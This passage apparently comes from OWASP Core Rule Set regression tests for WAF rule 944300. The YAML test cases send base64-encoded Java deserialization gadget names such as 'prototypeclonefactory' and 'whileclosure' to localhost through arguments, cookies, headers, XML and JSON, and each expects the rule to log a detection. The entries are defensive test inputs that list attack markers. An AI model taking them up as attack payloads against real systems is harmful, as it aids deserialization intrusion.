"{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-253 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-254 + desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-255 + desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-256 + desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-257 + desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-258 + desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-259 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-260 + desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-261 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-262 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-263 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-264 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-265 + desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-266 + desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-267 + desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-268 + desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-269 + desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-270 + desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-271 + desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-272 + desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-273 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-274 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-275 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-276 + desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-277 + desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-278 + desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-279 + desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-280 + desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-281 + desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-282 + desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-283 + desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-284 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-285 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-286 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-287 + desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-288 + desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-289 + desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-290 + desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-291 + desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-292 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-293 + desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-294 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-295 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-296 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-297 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-298 + desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + 